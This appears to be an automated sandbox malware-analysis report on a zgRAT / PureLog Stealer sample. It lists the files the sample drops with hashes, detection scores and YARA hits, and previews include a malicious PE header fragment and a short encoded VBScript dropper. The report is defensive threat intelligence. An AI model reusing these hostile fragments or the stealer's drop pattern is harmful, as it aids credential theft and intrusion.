                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Drivers\fontdrvhost.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Joe Sandbox View:
• Filename: Etqq32Yuw4.exe, Detection: malicious
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....pg.................j.............. ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....i... ...j.................. ..`.rsrc... ............l..............@....reloc...............p..............@..B........................H.......8..............................................................0..........(.... ........8........E............9.......8....*(.... ....8....(.... ....~....{i...9....& ....8....(.... ....~....{....9....& ....8........0.......... ........8........E....1...........g...{.......8,.......~....(B...~....(F... ....<.... ....8....~....(:... .... .... ....s....~....(>....... ....8|...~....:^... ....8h...8O... ....~....{....:O...& ....8D......... ....~....{....:*...& ....8....r
                                                                                                                  Process:C:\Users\user\Desktop\eP6sjvTqJa.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):239
                                                                                                                  Entropy (8bit):6.002556688611792
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:Gbt2wqK+NkLzWbHY08nZNDd3RL1wQJR62Eg+0BhPBWQRJ:GxMCzWLY04d3XBJDD+0BhPx
                                                                                                                  MD5:4890F14477D1A84A5BEB720942CE8DB4
                                                                                                                  SHA1:5110473AF3AD8D1CFB5E108D45A6B1B3156D3CAC
                                                                                                                  SHA-256:35714B614BA40D6C70441D10D07EC7B33F2F9D72737D1E35A104070F56B07800
                                                                                                                  SHA-512:19A185B77CAB6B4F64F145C4EDC995D0DF82ED4CDB823E919BC6ABB6F6C4420754F1596880FF72FBED26027AC938E7A555A5524802DFCCFED5ED09ACE73E2DC6
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  Preview:#@~^1gAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~JujH/O.:GDk7+u&zGDr\.Dd&J?2F)pxf9D)\(5Dm62N3-}2tvR[9XD$f`5G\-zy[/q0c4CDJBP!BP6CVk+EkQAAA==^#~@.
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Joe Sandbox View:
• Filename: Etqq32Yuw4.exe, Detection: malicious
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with very long lines (362), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):362
                                                                                                                  Entropy (8bit):5.8227394254856595
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:4yPPMhzUss5EeNsg7R4jckAqrVtBbQofITgloS5Lm+YpfHKPyobIVWs+/C1XM8cG:4UM9ulLKjVAqr5TQTgy8a+Y1wyaSp+gV
                                                                                                                  MD5:18B6CB1603FA90E99F1AF3BA44C8CBFF
                                                                                                                  SHA1:C32F5CAC2F916156D9C94B9772CE7EB757834974
                                                                                                                  SHA-256:2461B54CF25491CB468478AAF0DB81A212661443090F164D662D489EEE5F67C5
                                                                                                                  SHA-512:71ADA51D3E822E0E7FB5F37631AD0D41A683C4888908594A985DFF023DF10E366796A09366B07945CAC906F5AA706E60C229FE84C5AAE966728BCAEFB34ACD7E
                                                                                                                  Malicious:false
                                                                                                                  Preview:brmEGHa0jhJVDD7f1pJSDE5B1EgLYqcZTlpAXdeRW2KIvIYT8k7boISXwkMCkPb3FtCbY7IXL16L3xQtpMMysBvLTRNxQcqHaRDBG75BbkQwLHe9TdWXCnLD80HGtVGsKzultPnsRLWIu9AMxOdxFTEwF9DPzzRGdhlVW2PE0oG1QDT905Sf1Tn1v8gtMX2c3QoMXo058Z6aMMfCqDY3gwOJ4tkXWf1cvo8AYGlMFXgcWMoiceDI996HBfSnDcjchepiOfnjcMyIPwwrEB51ctdwr193x8ImyD42gGU60dqxKx1OskiCgrAyA20XguwdDMTM14K8r8A8Cqm4AuKNZGGHCG1oP7aGrMt8eoWyZk
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with very long lines (904), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):904
                                                                                                                  Entropy (8bit):5.903570142849392
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:h/HrVAPkCsailqTG/CxS3nnUyN/9vq0WYDouM0anNTGynS:h/HrckC1GqaCxS3nnUyN/BJWYZM0YjS
                                                                                                                  MD5:AE30803BC3DA822182C551A7C2F840C7
                                                                                                                  SHA1:AEAD6A637D2B556C9351D3CE80D88C12E25DB47B
                                                                                                                  SHA-256:F7DC8448AFBA98DE178C6E364D8EEA493BDA6185AD0B9B2A315A4DE60E50FD91
                                                                                                                  SHA-512:258D2D908C2D0DFA4876B817B53EA08813A668D12F07CCC4C2961F53B2C36B190CE83176AEF2B4D512A67BA2A4971370B97361D70AB865D47159CE8EA0E1C40F
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Internet Explorer\en-US\conhost.exe, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Internet Explorer\en-US\conhost.exe, Author: Joe Security
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Joe Sandbox View:
• Filename: Etqq32Yuw4.exe, Detection: malicious
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1995264
                                                                                                                  Entropy (8bit):7.563817177395898
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24576:3D3bq5QJoEoChSWB2yfXv3zXK8oH3y2e4OWURyGELRgROkTljwoLe/Jd0H1kI1n2:TTyyfXPzXKBy2GyGw4O0lmJIJ
                                                                                                                  MD5:0F52130D0A1ABBE40D9F582B1F95A3E3
                                                                                                                  SHA1:BEB72E7DCCFBFE80868AB9BA16B866A26D5B75D9
                                                                                                                  SHA-256:C0ECC22A4CC8EF912B7D1DE3DD48C9DC32CA053535AA71DA572AEB6F9C91D4AE
                                                                                                                  SHA-512:290A2F7FEEB312016DE0DBA0BFAA85328D0BD643D9683655650C7807A0E0D2527584821B00D89AF5F5B55A77492939A2168A541F11E5807A12965EBDC1440A0E
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with very long lines (658), with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):658
                                                                                                                  Entropy (8bit):5.893783528304391
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:KV+FENI5C9ridsOaeT/gzkQPY+lBTxbM/MdsJUVKncJPJbFtgIV:Fm6CB8LEPYkM/OsS7JbFtgIV
                                                                                                                  MD5:3ACB65A795D47292CBB60972112CACE3
                                                                                                                  SHA1:BF40EBA64213681296B3DBDF0C62B9C7AC2C28B4
                                                                                                                  SHA-256:FE4F9D5403C3275367286638E5FF5F4A648F1A5888A1780A0D6FDDC4D6F00986
                                                                                                                  SHA-512:48C79260112947F0EBE67E7D3E9D5EA24A8613A6C6B7ED52590559F785830FAE07C9C1470DE11F0286C5C0DE57A3E169508120BD703F61638445E636CB990DF3
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:CSV text
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):847
                                                                                                                  Entropy (8bit):5.354334472896228
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2041
                                                                                                                  Entropy (8bit):5.374034001672589
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkrJH1HzHKlT4vHNp51qHGIs0HKD:iqbYqGSI6oPtzHeqKktVTqZ4vtp5wmjB
                                                                                                                  MD5:6594A52AA7EC9BF342D53EF8C5C3F92F
                                                                                                                  SHA1:E4439EF0FB0002B8DAD1D7FC4BA598FEE910F4DE
                                                                                                                  SHA-256:1BCDE01217E85B5A7304A3DF69926B2B046B11826E3A70E78D220B063DB5EE2B
                                                                                                                  SHA-512:29B10494189EFC74EC781413CA1954053EA044EFA879C22EE1FC36D5CD80438F36EA87B7C9C8E0BC5216F13F2DDB893B37E5494A61A8A7DD830A5810A2016A84
                                                                                                                  Malicious:false
                                                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKey
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5242880
                                                                                                                  Entropy (8bit):0.0357803477377646
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                                                                  MD5:76D181A334D47872CD2E37135CC83F95
                                                                                                                  SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                                                                  SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                                                                  SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):155648
                                                                                                                  Entropy (8bit):0.5407252242845243
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                  MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                  SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                  SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                  SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5707520969659783
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                                  SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                                  SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                                  SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Drivers\fontdrvhost.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.213660689688185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:1RIOmaBZRcz:vIOmaiz
                                                                                                                  MD5:B5D59A733F427DFD771E95CCF4F53776
                                                                                                                  SHA1:16FCC0C500891F9E08CF4EB4BD8C41C858127ED7
                                                                                                                  SHA-256:F7F3AABFACCC42AA66F713F7CBEE8F8D22E59672D39FCC5E9D3022D60BA5B9B4
                                                                                                                  SHA-512:6161970137A3E289EB554BAAEF8FCAB82A7B0C6266B10069BBFC1133123339F411EB8F4984BCE626BAACE1D7668FCF26433B46E4A020246865E285DAAD777645
                                                                                                                  Malicious:false
                                                                                                                  Preview:I1gwbMGLOmCBfcd9ymyLtyvDd
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):25
                                                                                                                  Entropy (8bit):4.483856189774723
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:HjUB7UBZQn:DUB7UBZQ
                                                                                                                  MD5:061CCB94B797D39887F1B4C2FDAFCB12
                                                                                                                  SHA1:E737ED4B6C5C43CF060EB3525F5BECE1876188F7
                                                                                                                  SHA-256:BD5F71303CE342D8E83C88D39786331B9651A8190072F63441BBBBBC2FDB4BBB
                                                                                                                  SHA-512:25218934648290F7583AB3B90AFBADFE50456830373E1AC56059F483810741996EA08038EBB7C9F4D72682B5EE2116238BC4F05EC78748D2CB5CA8B0B6B0D8EF
                                                                                                                  Malicious:false
                                                                                                                  Preview:u7FRysAelVWl7rBHSqY5iTI69
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.8508558324143882
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                  MD5:933D6D14518371B212F36C3835794D75
                                                                                                                  SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                  SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                  SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.5712781801655107
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                                  MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                                  SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                                  SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                                  SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):40960
                                                                                                                  Entropy (8bit):0.8553638852307782
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                  MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                  SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                  SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):20480
                                                                                                                  Entropy (8bit):0.6732424250451717
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                  MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                  SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                  SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                  SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14
                                                                                                                  Entropy (8bit):3.378783493486176
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Y2Qt6eYYn:Y2Qt6eYYn
                                                                                                                  MD5:6CA4960355E4951C72AA5F6364E459D5
                                                                                                                  SHA1:2FD90B4EC32804DFF7A41B6E63C8B0A40B592113
                                                                                                                  SHA-256:88301F0B7E96132A2699A8BCE47D120855C7F0A37054540019E3204D6BCBABA3
                                                                                                                  SHA-512:8544CD778717788B7484FAF2001F463320A357DB63CB72715C1395EF19D32EEC4278BAB07F15DE3F4FED6AF7E4F96C41908A0C45BE94D5CDD8121877ECCF310D
                                                                                                                  Malicious:false
                                                                                                                  Preview:{"Surveys":{}}
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):106496
                                                                                                                  Entropy (8bit):1.136471148832945
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                  MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                  SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                  SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                  SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                  Malicious:false
                                                                                                                  Process:C:\Program Files (x86)\Google\Update\1.3.36.312\Recovery\GUR2DE8.tmp\AdbXCBUViTnoVBSsOq.exe
